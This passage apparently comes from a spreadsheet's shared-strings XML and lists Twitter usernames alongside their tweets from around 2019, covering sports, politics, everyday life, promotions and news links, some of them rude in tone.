    <t>@vandersonauthor Women's Breakfast (a nod to English breakfast, the tea, and the quote: “A woman is like a tea bag – you never know how strong she is until she gets in hot water.” – Eleanor Roosevelt)</t>
  </si>
  <si>
    <t>13EAR5</t>
  </si>
  <si>
    <t>@dojacrush @Jatin90658343 @KidKyros @crueIsummers I'm Canadian and live in a Metropolitan area lol, and I see Yeezys every day, way more than their counterpart like Pharrells, Gucci, LV, etc.</t>
  </si>
  <si>
    <t>RosemaryJ36</t>
  </si>
  <si>
    <t>Please read the Editorial, then ask yourself: Is ⁦@ScottMorrisonMP⁩ a fit person to be elected to Parliament, let alone a fit person to lead our national government? https://t.co/NJNGXd5N9U</t>
  </si>
  <si>
    <t>wolfzonehype</t>
  </si>
  <si>
    <t>@SypherPK Welcome to my world depressed alone and in pain your the only streamer who keeps me going because your loyal and respectful and loving to everyone</t>
  </si>
  <si>
    <t>comstocksmag</t>
  </si>
  <si>
    <t>Hopping Again: Fair Oaks Village is experiencing a renaissance fueled by new drink and dining options https://t.co/dopBi8iqKS by @newsbabe1530</t>
  </si>
  <si>
    <t>2papierre</t>
  </si>
  <si>
    <t>All of us would like to make $5k $10k or more, right? https://t.co/aKblYLDAuv</t>
  </si>
  <si>
    <t>jthe_legend</t>
  </si>
  <si>
    <t>And idk how she did it... but they gave her a new bracelet, a “mini gift” for her troubles, a new blue box with the bow, and a note of apology. 😂😂😂</t>
  </si>
  <si>
    <t>gnwong</t>
  </si>
  <si>
    <t>@vsblearns welcomes 7 school teams for #teachercollabinquiry with @sashatech1 from @POPEYBC to dive into @FountasPinnell Word Study Lessons! How might we meet the needs of our learners? Looking forward to a year of exploring, wondering, learning &amp; reflecting together! #nharrison https://t.co/WjVkDtRRZC</t>
  </si>
  <si>
    <t>reaper9602</t>
  </si>
  <si>
    <t>@indiansufijee @PrashantPGurav1 @i_theindian 100% agree this is all what we say...if I live in up i will learn hindi, actually i speak some hindi too, it should be by choice not by imposition</t>
  </si>
  <si>
    <t>WMHS_Careers</t>
  </si>
  <si>
    <t>See our latest #Cumberland, MD job and click to apply: Licensed Practical Nurse - Clinics &amp; Practices - https://t.co/6rHGt1gzr7 #Nursing</t>
  </si>
  <si>
    <t>pmfeline</t>
  </si>
  <si>
    <t>@Tam__Tams Woohoo, that's one of your faves 🥰 and let your dad take pics.. that means he wants all the Tammy memories and he adores you unlimited amounts. Be safe little Angel girl. Also, enjoy a home cooked meal instead of all that take out. You so lucky ☺️🥰💕🤗</t>
  </si>
  <si>
    <t>flowerpaul</t>
  </si>
  <si>
    <t>@EricRubenLaw I get the point. But the image in my head makes me giggle.</t>
  </si>
  <si>
    <t>BichonSnuggles</t>
  </si>
  <si>
    <t>@Amaoricangirl56 @commonwealthfnd Many nurses feel otherwise, the National Nurses Union supports Medicare For All https://t.co/uI8Qwftff3</t>
  </si>
  <si>
    <t>CharlaJean1</t>
  </si>
  <si>
    <t>When you are so busy thinking about other situations that you can't enjoy the present your stress level will go up. https://t.co/pjpT8WqPYd</t>
  </si>
  <si>
    <t>Adnan99</t>
  </si>
  <si>
    <t>@Deadspin He’s bad at football (and fashion )</t>
  </si>
  <si>
    <t>canc3rrrr</t>
  </si>
  <si>
    <t>She said “this Gravity made her Fall” so i had to Dipper💯💨 https://t.co/jIc7gbhkfg</t>
  </si>
  <si>
    <t>ETCanada</t>
  </si>
  <si>
    <t>#AnnaLynneMcCord is opening up about her PTSD treatment https://t.co/0Pphj1sef1</t>
  </si>
  <si>
    <t>MartinBown6</t>
  </si>
  <si>
    <t>@jonathanhaggart Just got back from ten pin bowling. I don’t think this will ever be resolved. Turnout in the initial vote was 72.2% so we still don’t know what approx 13M people think. Now the vote has been held it has just highlighted the split in the UK almost down the middle.</t>
  </si>
  <si>
    <t>lkay54</t>
  </si>
  <si>
    <t>@AaronBosterMD @MSViewsandNews @shiftms @MS_Focus @RumaizaAlyafeai @AngelaButynski @jamessh07054823 @FromDaddyWLove @scleroplex @MSenIt4life @Hawks50_2 @ectrimscongress I want to hear if you bring home anything new from #ECTRIMS2019 or if it’s the same song, different verse. Treat early, exercise, eat healthy, Vit D, etc etc.... hope a YouTube wrapup is in the near future</t>
  </si>
  <si>
    <t>whotfisyoshi</t>
  </si>
  <si>
    <t>@ my lost lands goers, please take some b-12 with you especially for after it's over</t>
  </si>
  <si>
    <t>jreynaga21</t>
  </si>
  <si>
    <t>#Raiders NO!!! Fellow Raider fans it’s not Grudens fault for trading Mack since everybody wants to blame Carr for everything right now it’s his fault dam right it is</t>
  </si>
  <si>
    <t>WahlTruckBoston</t>
  </si>
  <si>
    <t>Come and grab some burgers at Boston Arts &amp; Local Music Festival today 11-4PM at @cityhallplaza 🍔 https://t.co/IJf1KMxWzD</t>
  </si>
  <si>
    <t>ShannonNova3</t>
  </si>
  <si>
    <t>@REALSONICDANGER @KtObermanns @ronwriteswords @meridianround @theMeg_theLoch @FluffyTank_666 @kilznite0411 @Starrcade83 @starrfade @adroc31 @JessicaLexicus @GhostMoon20 @littlevixen90 @MysticalJamie @CreepiesRobin @Boobafett69 @Xenon1313_ @Halloween_1014 @beernut1 @SeraBoo @Jo19Peachy @JimmyDetroit1 @kinky_horror @Chinchiiilllaaa @AngelofHorror69 @quembelle @BillandRoxy @thepaulahunt @Dee_Xiao_Long @GodOfGore13 @skream_kween @giddyseizure @BadurdayFilms @almayoftherock @TBarbourshop @mrancourt @the_gold_finch @sagaston @CateSpice @CattyDonnelly @PatrickAT @LozagaRx @abbythetweet @angiebulkeley @WerewolfCat9 @TheProwler3 Thank you, LT! You're the best! Favorite Horror Movie Gif...Hmm @Annathesa @AshTudor888 @SheiDarksbane https://t.co/tGqhwTEkvP</t>
  </si>
  <si>
    <t>usdealsonline</t>
  </si>
  <si>
    <t>FIRE PLACE MANTLE STOCKING FAMILY OF 9 PERSONALIZED CHRISTMAS TREE ORNAMENT 2017 Category: Small Appliances Vendor: Bonanza (Global) Price: $14.80 Brand: Rudolph and Me FREE PERSONALIZATION EXPERTLY DONE! Please provide your personalization... - https://t.co/knADl7VLEU https://t.co/Te4xONzZ0D</t>
  </si>
  <si>
    <t>SamuelHBlack</t>
  </si>
  <si>
    <t>@CalebDMTG Just toss a couple boosters in there for comfort</t>
  </si>
  <si>
    <t>BingleBongup</t>
  </si>
  <si>
    <t>The license plate game gets easy when youve driven through four states</t>
  </si>
  <si>
    <t>RESTbyGAIT</t>
  </si>
  <si>
    <t>Parent To Parent: Supporting Your #ADHD Child at School 3 Online Sessions | Sept. 11-25, 12-1:30 PM ET https://t.co/2YCzsiDDZ5 https://t.co/xRzFp8Ge3j</t>
  </si>
  <si>
    <t>animturnbull</t>
  </si>
  <si>
    <t>@ricklessabandon @paul_jarvis I have to create a new account anyway as my old on is an EU account and its apparently impossible to change? So I can get a free trial on my US account</t>
  </si>
  <si>
    <t>geofficient</t>
  </si>
  <si>
    <t>@elonmusk I am from the future. This song was just re-released and hit #1 in 2525 Top 100, while They Impeached the Tweeting M*therfucker is #1 on the Mars Elon Times Bestseller List for comedy. https://t.co/wXQko059AZ</t>
  </si>
  <si>
    <t>ericcbarnes</t>
  </si>
  <si>
    <t>@LGoonerHoward I have never had the opportunity to walk over the Brooklyn bridge - hope you have done!</t>
  </si>
  <si>
    <t>lil_tungsta</t>
  </si>
  <si>
    <t>@doublejcosplay Especially for us. 👀🔥☠️</t>
  </si>
  <si>
    <t>MAX3D2</t>
  </si>
  <si>
    <t>@Reuters @GretaThunberg Stolen your dreams? WTF you little brat! You live an entitled life and have the nerve to say we stole your dreams! Ya damned CLIMATE HOAX PUPPET!</t>
  </si>
  <si>
    <t>RHCBEducators</t>
  </si>
  <si>
    <t>Happy #LibraryCardSignup Month! Discover the wonders of the library with Patience and Fortitude in THE NIGHT LIBRARY by @davidzeltser, illustrated by Raul Colón. Then celebrate by getting your very own library card this September. https://t.co/zOJV5XkVxu https://t.co/cMjZWDaY6h</t>
  </si>
  <si>
    <t>MayorShelton</t>
  </si>
  <si>
    <t>Planned power outage scheduled for Downtown Niles starting 9/10 @ 11:00pm- Wednesday 7:00am. Will affect same customers as last week's planned outage. Thank you.</t>
  </si>
  <si>
    <t>T_Swain</t>
  </si>
  <si>
    <t>Taco active against the boys today. Watch him make some plays 🙄</t>
  </si>
  <si>
    <t>HDagoni</t>
  </si>
  <si>
    <t>@KikiAdine @CarolynYoung64 @Acosta Stronger case?? 😂 You heard it from Comey and from Mueller. The case is so weak and that is why Pelosi can't start an impeachment inquiry.</t>
  </si>
  <si>
    <t>FlowJunkie311</t>
  </si>
  <si>
    <t>@brianchastings Biden is a "Nice" Surrogate for Trump. I want the world to be better but at the same time I am afraid of too much change.</t>
  </si>
  <si>
    <t>jessicalynnsg</t>
  </si>
  <si>
    <t>One time I had this customer tell me she wanted her receipt emailed to her, then came in 5 minutes later to return it, but didn’t have her receipt and processed to blame “millennials” and their use of technology</t>
  </si>
  <si>
    <t>JBimagestylist</t>
  </si>
  <si>
    <t>Investing in yourself is a sensible strategy if you want to en... More for Taurus https://t.co/QIQQfBY35u</t>
  </si>
  <si>
    <t>Brian58424146</t>
  </si>
  <si>
    <t>@Bjorkian15 @realDonaldTrump So, I take it that you're not going to address the salient points POTUS made, and instead hurl childish insults that 99% of the respondents do that despise our President? #qanon #WWG1WGA #GOP #liberalhypocrisy #KavanaughLied</t>
  </si>
  <si>
    <t>PBuckley</t>
  </si>
  <si>
    <t>More depth on AI from @Gartner_inc’s @Lepervier “Whyh bother creating a synthetic human when we already know how to use them?” #uwebc19 @UWEBCweb https://t.co/vbB5v351oo</t>
  </si>
  <si>
    <t>TJPrimary</t>
  </si>
  <si>
    <t>After receiving a letter from Shrek explaining that his swamp home has been ruined, Year One have been designing a new swamp for Shrek. We are sure he will love his new home. And we loved the great design skills and teamwork we saw from the children. #TJEnglish. #YearOne</t>
  </si>
  <si>
    <t>YesikaStarr</t>
  </si>
  <si>
    <t>She was really sweet but hella extra. I’ve reached my yt lady quota for the day.</t>
  </si>
  <si>
    <t>Newsweek</t>
  </si>
  <si>
    <t>Facebook Dating: How to use, how to find "secret admirers" and where it's available https://t.co/iG7QZCFxvg</t>
  </si>
  <si>
    <t>GusFantastico</t>
  </si>
  <si>
    <t>@StillRadNotaFad How long did it take them to install? And how long did you have to wait, before they started?</t>
  </si>
  <si>
    <t>theirastra</t>
  </si>
  <si>
    <t>@Talen_Lee something to do with daylight? maybe?</t>
  </si>
  <si>
    <t>mikeybrandon</t>
  </si>
  <si>
    <t>@plavi02 @EZBiGirl Who pulls laundry out of the dryer, tosses it on the ground, and then folds it??</t>
  </si>
  <si>
    <t>Corey_Peters</t>
  </si>
  <si>
    <t>@SethAbramson The only thing Bill ruined was a dress</t>
  </si>
  <si>
    <t>MyTruthStorm</t>
  </si>
  <si>
    <t>"It's really bizarre, these people. And they're so narcissistic, so irrational, so immature -- all of them," Levin said. #FoxNews https://t.co/28btxGjR3k</t>
  </si>
  <si>
    <t>AleutheMermaid</t>
  </si>
  <si>
    <t>I want to take a depression bath but I already took one today. :/</t>
  </si>
  <si>
    <t>alliewarren0024</t>
  </si>
  <si>
    <t>nephew: has trust fund &amp; asks me for money me: broke college student with negative bank balance https://t.co/GI0l8sNQzR</t>
  </si>
  <si>
    <t>J56496139</t>
  </si>
  <si>
    <t>@SuzonDesign @SGH_RTs @ScrimFinder @BlazedRTs @TwitchSharing @LaZy_RTs @supstreamersrt @Mighty_RTs @TwitchTVGaming @TwitchTVOnline He's legit! Had my order done within 2 days. Will do more business in the future! 🔥🔥🔥</t>
  </si>
  <si>
    <t>_devban</t>
  </si>
  <si>
    <t>@adamscrabble As I said, no point discussing this. My parents' place in Calcutta is right next to left wing university bastion. These people are nice but refuse to move on. Time to colonize pace. Low gravity cricket ftw 🚀</t>
  </si>
  <si>
    <t>Bekahtomic</t>
  </si>
  <si>
    <t>I just seen the sweetest pitt bull at the pet groomers today. But i don't think George liked her... https://t.co/P5LS121XVR</t>
  </si>
  <si>
    <t>maxyote</t>
  </si>
  <si>
    <t>@silverwuffamute From what I can see on the notice, they had two noise/domestic disturbance calls to Police AND haven’t paid Septeber rent yet.</t>
  </si>
  <si>
    <t>LadyWithA_C</t>
  </si>
  <si>
    <t>Now all of us in GA it’s more like summall 💁🏽‍♀️ ➖➖➖➖➖➖➖➖➖➖➖ And I am ok with that! Chrissy love the heat and hates layers but I enjoy soup season whole heartedly ➖➖➖➖➖➖➖➖➖➖➖ #cookingwithchrissy #boymom… https://t.co/RQVp8KdiLX</t>
  </si>
  <si>
    <t>Arixalaverga</t>
  </si>
  <si>
    <t>@sidtheesquid Now everyone listens to this song saying they been knew it 🤣 like no you did not, shut up 🙄🤣</t>
  </si>
  <si>
    <t>j_gelling</t>
  </si>
  <si>
    <t>@LebarbeH @pbesong Indications are he's a CIA analyst who was NOT working at the White House when any of the events he complains of occurred, he's merely relaying hearsay reports from other alleged sources. I severely doubt Mr. Trump knew a relatively low-level CIA analyst in any great capacity.</t>
  </si>
  <si>
    <t>KaylaDuyck</t>
  </si>
  <si>
    <t>Happy Sister Workout Sunday!! Another rainy sunday in the books!! #noominformyhealth #supportivefriendsandfamily #miketomysulley #sistersbychancefriendsbychoice #wegotthis #nevergiveup… https://t.co/DeAbMzsPtx</t>
  </si>
  <si>
    <t>mo04528689</t>
  </si>
  <si>
    <t>Alison Moyet - Le Soleil Est Revenu https://t.co/5XeS41tSIj via @YouTube First time hearing this and it just makes me HaPpY 😊✨ 🇫🇷♥️ 🇫🇷 🌞</t>
  </si>
  <si>
    <t>acidemixly</t>
  </si>
  <si>
    <t>I’m here to troll</t>
  </si>
  <si>
    <t>shs_raider</t>
  </si>
  <si>
    <t>Juniors showing off their spirit! Way to go Raider Girls Soccer! #BleedBlue https://t.co/dBKkyDnIXn</t>
  </si>
  <si>
    <t>LA_Crystal</t>
  </si>
  <si>
    <t>@ZeraphKing @RedwoodGirl @RockyMountViews @allinwithchris @JetScoozr77 @chrislhayes @mattyglesias Exactly. I'm muting this pointless conversation. I'm sure you've got a musket to tend to.</t>
  </si>
  <si>
    <t>jazxrod</t>
  </si>
  <si>
    <t>I really need to get our hospital bags packed already lmao</t>
  </si>
  <si>
    <t>AdrianAtticus</t>
  </si>
  <si>
    <t>There's no way I can save you 'Cause I need to be saved, too 😔</t>
  </si>
  <si>
    <t>RachelLeeAdrian</t>
  </si>
  <si>
    <t>I stayed up til now waiting on my brand new blanket and comforter to dry and I have ZERO regret. Fresh new stuff is so satisfying</t>
  </si>
  <si>
    <t>trishaashley</t>
  </si>
  <si>
    <t>@jodie_l_marley Twelve - it's actually the Last Supper and I've popped in as Mary Magdalen.</t>
  </si>
  <si>
    <t>Groundsmansfor1</t>
  </si>
  <si>
    <t>@somersetlevel Where's the next demo, Tarquin?</t>
  </si>
  <si>
    <t>Justjen__poet</t>
  </si>
  <si>
    <t>the mass self sabotage and self hate. The subconscious programming that keeps us in a low vibrational state, learned behaviours that dont benefit us.</t>
  </si>
  <si>
    <t>HOMARADIO</t>
  </si>
  <si>
    <t>On 100.3 - "Don't You Care" by the Buckinghams https://t.co/1qfvjJT4Er</t>
  </si>
  <si>
    <t>zelo_street</t>
  </si>
  <si>
    <t>ICYMI Leave EU Investigations NOT All Dropped: campaign is NOT in the clear .. THEY LIED AGAIN https://t.co/RniTVT2LUR https://t.co/JFoVsXIdUN</t>
  </si>
  <si>
    <t>Ecellence2</t>
  </si>
  <si>
    <t>If you’ve got some spare plastic soda bottles in your home, use them to make a DIY water sprinkler. This water sprinkler is simple, economical and functional! #lifehacks #diy #lifehacking #lifehackers #hack #tips #creative #hacks #diys #craft #life #lifehacker #love https://t.co/p34tAm1p6E</t>
  </si>
  <si>
    <t>GopherHole</t>
  </si>
  <si>
    <t>Morgan to Tyler Johnson gets Johnson over 100-yards on the day!! 22-yard gain to the 48-yard line! #Gophers</t>
  </si>
  <si>
    <t>unitedcoventry</t>
  </si>
  <si>
    <t>Cov United Member Offer : 2-4-1 Bowling and Sector 7 Laser Quest for members and up to 5 friends - Monday to Friday excluding Bank/School Holidays - on production of Membership Card #TenpinCoventry</t>
  </si>
  <si>
    <t>CrucibleSH</t>
  </si>
  <si>
    <t>@ReinBourne Honestly S1 was the best but S3 picks it back up. Also wasn't a fan of Kurapika</t>
  </si>
  <si>
    <t>AdamPugh</t>
  </si>
  <si>
    <t>Prison is literally the most ineffective deterrent. If we are being honest we've all got a couple of things and people we would willingly do time for.</t>
  </si>
  <si>
    <t>ColinMooreDraws</t>
  </si>
  <si>
    <t>Oh well. At least this means I can try streaming again soon! I doubt anyone wants to watch me do flats, anyway.</t>
  </si>
  <si>
    <t>__MotherCUNT</t>
  </si>
  <si>
    <t>now i gotta get up and drive out largo basically to get my daughter</t>
  </si>
  <si>
    <t>locy_gemma</t>
  </si>
  <si>
    <t>🍏 Jumpstart your week with the beautiful Amber (32 Photos) https://t.co/xLkKyvBHPD</t>
  </si>
  <si>
    <t>ringworm9_</t>
  </si>
  <si>
    <t>@Syntax16_H1Z1 You shoulda looked harder for this one 😂 https://t.co/rsRD37hT9C</t>
  </si>
  <si>
    <t>AidnThaAssassin</t>
  </si>
  <si>
    <t>@WitnessCole My friend can’t spend any money because he just moved in for college.</t>
  </si>
  <si>
    <t>yogaDGAF</t>
  </si>
  <si>
    <t>@woahmims stop posting jackie to the TL and I'll stop cursing you</t>
  </si>
  <si>
    <t>ChefCurtis96</t>
  </si>
  <si>
    <t>@uslargentina @mlsargentinaok @dcunited @YamilAsad11 @USLChampionship He’s going to be playing with Loudon for the rest of the season, I believe.</t>
  </si>
  <si>
    <t>TimothyJordan24</t>
  </si>
  <si>
    <t>@PFTCommenter Did @hen_ease have to speed up your voice for this or are you just the Daniel Day Louis of Barstool?</t>
  </si>
  <si>
    <t>ThePaigeRandall</t>
  </si>
  <si>
    <t>@TheOnlyMommaG And Dairy. It's pretty terrible.</t>
  </si>
  <si>
    <t>llamaterrible</t>
  </si>
  <si>
    <t>how do ANY of you eat a reasonable amount. I've had one actual meal today and I feel like shit for making mess</t>
  </si>
  <si>
    <t>MagicJonesMusic</t>
  </si>
  <si>
    <t>Wow, this song came from an unexpected place. Facing Doubt is an ode to life not going the way we want it to or the way we think it should. From my experience, life has a funny way of making sure that happens. Enjoy my musical offering, "Facing Doubt" https://t.co/dhOc6R8Rfp</t>
  </si>
  <si>
    <t>danhgilmore</t>
  </si>
  <si>
    <t>@russianmachine Thank you for adding "weak"</t>
  </si>
  <si>
    <t>jonniegrieve</t>
  </si>
  <si>
    <t>@bensprattjourn I love that lol. I remember the recent Harry Kane equaliser in a recent England match against Scotland. I watched it from the perspective of him scoring to the right. But the Sky coverage showed it the other way. And I thought the goal looked better :)</t>
  </si>
  <si>
    <t>ProfeGreg</t>
  </si>
  <si>
    <t>@PeteHegseth You ain’t got nothing on me! Thanks for the inspiration to take it up a notch. @soxy https://t.co/DseqN7WuKJ</t>
  </si>
  <si>
    <t>PGOperations</t>
  </si>
  <si>
    <t>@LizClaman I din't catch your show today Liz, but considering what's going on around the World, "I" think the Markets held up very well. But hey what do I know, I wanted to buy APPL at $10's and was talked out of it. :(</t>
  </si>
  <si>
    <t>ogobogocom</t>
  </si>
  <si>
    <t>Kiernan Shipka And January Jones Had A Mad Men Reunion As Their Characters. https://t.co/WTogv2suCl</t>
  </si>
  <si>
    <t>DivvyHQ</t>
  </si>
  <si>
    <t>Word of mouth marketing is critical for any business, but most don’t have a true strategy in place for it. Jay Baer says Talk Triggers are the answer. https://t.co/kWgVPpm2AR #contentmarketing https://t.co/7xQsxzSSyB</t>
  </si>
  <si>
    <t>franciscanmonk</t>
  </si>
  <si>
    <t>Brother Sean played this beautiful version of the Magnificat during Friday Evening Prayers Live on our Facebook channel. https://t.co/ynaAjsXZ5a https://t.co/9xg5IOc0Wh</t>
  </si>
  <si>
    <t>DanWFitzpatrick</t>
  </si>
  <si>
    <t>As the S&amp;P 500 flirts with all-time highs, U.S. stocks are fueling a buy high, sell higher market. #Markets #Economy https://t.co/aLCB6TVn6K</t>
  </si>
  <si>
    <t>savlifeonline</t>
  </si>
  <si>
    <t>Matthew 4 Jesus Is Tested in the Wilderness 4 Then Jesus was led by the Spirit into the wilderness to be tempted by the devil. 2 After fasting forty days and forty nights, he was hungry. 3 The tempter came to him… https://t.co/rTG97AS0kC</t>
  </si>
  <si>
    <t>broodbeen233</t>
  </si>
  <si>
    <t>Proud dad moment. Daughter was accepted to univ of Wisconsin for early admittance to Physiacl Therapy school. Great job baby. @tararoodbeen. #hardworkpaysoff #dadproud</t>
  </si>
  <si>
    <t>justinwells2424</t>
  </si>
  <si>
    <t>Ehlinger to Duvernay. Extra point coming, then onside kick. 22 seconds remaining... #HookEm</t>
  </si>
  <si>
    <t>CoreyScalesINS</t>
  </si>
  <si>
    <t>👉 Our auto insurance is a contract between you and us that protects you against financial loss in the event of an accident or theft. In exchange for your paying a premium as per the policy. Visit our 🌐 website today! https://t.co/OaClu8KTPA #healthinsurance #bikeinsurance https://t.co/n8Dgn9Jtq7</t>
  </si>
  <si>
    <t>VicarJim</t>
  </si>
  <si>
    <t>Pictures on the Sea of Galilee. The museum item is the remains of a boat that dates back to the time of Jesus. https://t.co/qfiaXY23vO via @VicarJim</t>
  </si>
  <si>
    <t>mbohlmann</t>
  </si>
  <si>
    <t>@JeremyLittau But most students and hardly any units know the laws, like an intern doing a shoot for a department promo video would require the intern to have RPIC certificate</t>
  </si>
  <si>
    <t>MissAdamsx</t>
  </si>
  <si>
    <t>I know it’s a bit late in the game but it’s only just kinda hit me that I’m an actual teacher. ‘What do you do?’ ‘Oh, I’m a Drama teacher’. I will never get tired of saying that! #NQT #FirstDayJitters #ReadyReadyReady</t>
  </si>
  <si>
    <t>UhKear</t>
  </si>
  <si>
    <t>Y’all ladies stay disgruntled on Twitter about men. Here’s a simple solution: Stop fucking, caring, loving and thinking about men.....if you can do that, maybe you won’t be so angry at us</t>
  </si>
  <si>
    <t>ComplainingEars</t>
  </si>
  <si>
    <t>@GMB @paulross Why are you still banging on about this? Nobody actually cares and those that do need to get out more</t>
  </si>
  <si>
    <t>SarahMissesDad</t>
  </si>
  <si>
    <t>@thegoodcatboy Me and the boys at 2am lookin' for B E A N S.</t>
  </si>
  <si>
    <t>smith_tom17</t>
  </si>
  <si>
    <t>Immensely proud big brother can’t wait for you to turn into a scabby uni rat like me https://t.co/GXGkcpyoJi</t>
  </si>
  <si>
    <t>SportsYardFC</t>
  </si>
  <si>
    <t>#SPORTFANS, today’s the day: get some good snacks, find a comfy chair, place your #fantasy #predictions on @SportsYardFC and pull up to watch the results! 📺🏈 Make sure you catch this @nfl match: @atlantafalcons vs… https://t.co/4U6niUGyqO</t>
  </si>
  <si>
    <t>KALBtv5</t>
  </si>
  <si>
    <t>#WATCH: Two people are under arrest following a deadly shooting in the Charles Park area of Alexandria last night. Al, Brooke, and Steven discuss this and more on Tuesday’s Second Look. https://t.co/foVo4Hl6sK</t>
  </si>
  <si>
    <t>thompsonteamMA</t>
  </si>
  <si>
    <t>Did you know that approximately 1/3 of all home sales in this area happen between September and December? This has been historically true. Below are the number of home sales for last year for 4 towns It's time to sell- Give the Thompson Team a call today (978) 844-0188! https://t.co/DrHEQvRbU6</t>
  </si>
  <si>
    <t>rkfphoto98</t>
  </si>
  <si>
    <t>Buddy Kofoid in the Keith Kunz sprint car https://t.co/V61YOXaLvw</t>
  </si>
  <si>
    <t>SoccerShoregals</t>
  </si>
  <si>
    <t>Final from St. Ignatius - Avon Lake 3 St. Joseph Academy 0 Second half goals by Liz Manly assisted by Adele Osberg and Kaley Norris off a free kick. Emily Yarham records the shutout. Great effort today girls!!!!</t>
  </si>
  <si>
    <t>hentvsmom</t>
  </si>
  <si>
    <t>Someone working and some playing. @hentvv doing his sunday chores. 👍🤫🤭</t>
  </si>
  <si>
    <t>crockett4</t>
  </si>
  <si>
    <t>@SenFeinstein But you and Dems and mainstream media called trump corrupt for days based on no facts! You dope</t>
  </si>
  <si>
    <t>MmmSusiee</t>
  </si>
  <si>
    <t>Couldn’t find anyone to wake and bake with me, so my boyfriend calls me and we smoked a blunt via facetime 🤩😂❤️</t>
  </si>
  <si>
    <t>blakeleigh</t>
  </si>
  <si>
    <t>@cheerioo Yeah with the ME! Single !</t>
  </si>
  <si>
    <t>tashdesirae</t>
  </si>
  <si>
    <t>Investing in yourself is a sensible strategy if you want to en... More for Taurus https://t.co/hNHwR1V4Vc</t>
  </si>
  <si>
    <t>alisonburnis</t>
  </si>
  <si>
    <t>This is a main road going north. And yes, I was extremely irritated (and late, thankfully I built buffer time into my planning) when I had to turn around and find an alternate route home.</t>
  </si>
  <si>
    <t>carolynicgy</t>
  </si>
  <si>
    <t>Download Free The Inquisition: Summoner: Book Two (The Summoner Trilogy) =&gt; https://t.co/HUre7z3IDB</t>
  </si>
  <si>
    <t>KelticSC</t>
  </si>
  <si>
    <t>@Ianmcpherson22 @TeelaResists So you’d hire someone at that rate who had to learn on the job? I don’t think that’s how business leaders operate. A carpenter wouldn’t do that let alone a billion dollar company</t>
  </si>
  <si>
    <t>PBtutors</t>
  </si>
  <si>
    <t>@thehill NOBODY but him can believe this. Is he justifying the toilet being an appropriate source of drinking water? Somebody should have pushed him under the water.</t>
  </si>
  <si>
    <t>andrewkfor</t>
  </si>
  <si>
    <t>@tachiai_blog @SumoFollower @kodamacanada @LordBermondsey @Sumo_Jason Here's the real question what hair is getting cut?</t>
  </si>
  <si>
    <t>HARUHARUpinku</t>
  </si>
  <si>
    <t>I wanna have a shower but a package is meant to be arriving today and I just know what ll happen if I do</t>
  </si>
  <si>
    <t>LGBTQ_Military</t>
  </si>
  <si>
    <t>Today we celebrate the 8 yr anniversary of the end of “Don’t Ask, Don’t Tell” (DADT)🥳, and we double down in our work to overturn Donald Trump’s new version of DADT — an unconscionable #TransMilitaryBan. #SupportTransTroops Read more via @TheAdvocateMag https://t.co/n9k8hcMC3x https://t.co/nXxeP85p8X</t>
  </si>
  <si>
    <t>GridDarkWolf</t>
  </si>
  <si>
    <t>@pappawalle @threeguysyesh @SethAbramson @realDonaldTrump @GretaThunberg She should go home and go to school. The world isn't going to end in 12 years.</t>
  </si>
  <si>
    <t>ughjas</t>
  </si>
  <si>
    <t>What happened to our love? When did I stop being enough 😴</t>
  </si>
  <si>
    <t>NotNDrake</t>
  </si>
  <si>
    <t>cause you look even better than the photos</t>
  </si>
  <si>
    <t>she_brews11</t>
  </si>
  <si>
    <t>@winningatmylife @seanmdav @MZHemingway @nypost I’d like to “like” this because you are so right but I’m too livid to be able to like it. 😡</t>
  </si>
  <si>
    <t>MsJenn4u2nv</t>
  </si>
  <si>
    <t>We live in a generation where a woman is labeled “Crazy” because she won’t allow a man to mistreat</t>
  </si>
  <si>
    <t>Rowdygirlinmt</t>
  </si>
  <si>
    <t>@carsinspace @DevinCow @SenatorTester He always responds when I write to him which is great! If we don’t agree on something, he always explains why he’s voting a certain way!</t>
  </si>
  <si>
    <t>dt3000thebest</t>
  </si>
  <si>
    <t>@Selfmade_Shia Right, I think it would definitely be close if we were on the road</t>
  </si>
  <si>
    <t>shugmac_shug</t>
  </si>
  <si>
    <t>We all been waiting to hear from @rihanna do y'all 🎶 think She will do a hot song witta nigga I FEEL LIKE SHE WILL BE ON GO 🔥💯🔥💯🔥🤯💯🤯🏋🏽‍♀️</t>
  </si>
  <si>
    <t>StellaPlum</t>
  </si>
  <si>
    <t>The latest The Women's Equality Party #wepUK Roundup! https://t.co/0N5loz4y08 Thanks to @OliviaVincenti @Tigerliy23 @WEPYork #vawg #nursing</t>
  </si>
  <si>
    <t>CakeBunnyNSFW</t>
  </si>
  <si>
    <t>His weakness is that he must actually touch an open source of electricity to absorb it, like an outlet or some broken wires or electricity spilled in some water / electrolytes. He can't conjure up powers from thin air, so if he has none absorbed, he basically has no power. (8)</t>
  </si>
  <si>
    <t>wilma_mcewan</t>
  </si>
  <si>
    <t>@ThornyStem @mlindsay122015 @yona1959 @FionaSnp @WingsScotland @ForwomenScot I find them absolutely unbelievable, they seem hell bent on destroying the whole of SNP and any future ref with it.</t>
  </si>
  <si>
    <t>VegasRaidersGD</t>
  </si>
  <si>
    <t>Hey, @HoustonTexans, you're up. Here's your chance to again prove your front office has no idea what it's doing... #ABtoHOU</t>
  </si>
  <si>
    <t>Barrel1984</t>
  </si>
  <si>
    <t>@mattnicholls29 @Rory_Flanagan Nice work, was there something that made you think he was close to turning it around?</t>
  </si>
  <si>
    <t>unsurprisedbyit</t>
  </si>
  <si>
    <t>@SlickReynolds @stevebyrnelive @TitusNation @RealCarrotTop @billburr @SalVulcano Totally. That was a pretty harsh comment from your boss. I can see why you’re doing your best to spread the story. You keep doing you, let’s not judge comprehension juuuust yet, you seem... special.</t>
  </si>
  <si>
    <t>ErichsenDaniel</t>
  </si>
  <si>
    <t>@nyxdontsleep Ouch :/. So, what time do you go to bed? It sounds like you’re up all night to finaly sleep 6/7 AM?</t>
  </si>
  <si>
    <t>ARWDUK</t>
  </si>
  <si>
    <t>@alisstanley @Ms_Nichola @tinytinabuckley @scottcapurro @channel5_tv @channel5 @JeremyVineOn5 @terrychristian @BoyCharioteer 😂Hammerhead is whichever rw hack is sat in far right of panel . Oh what is wrong with us? Is it possible to have an overdose of Vine😱</t>
  </si>
  <si>
    <t>4k_JRich</t>
  </si>
  <si>
    <t>@_marcooo22 On god lmao I thought I was the only nigga who knew about that</t>
  </si>
  <si>
    <t>fille404</t>
  </si>
  <si>
    <t>@Rhon27598583 @DamenGerry @LeonieBelcher @IsaiahLCarter I too am a woman, so these issues affect me just as much. But even if I wasn't, I would still stand with you &amp; fight for cis women if I was persuaded that the gendercrit case had any basis in the lived experience of women, rather than in ideology. 1/2</t>
  </si>
  <si>
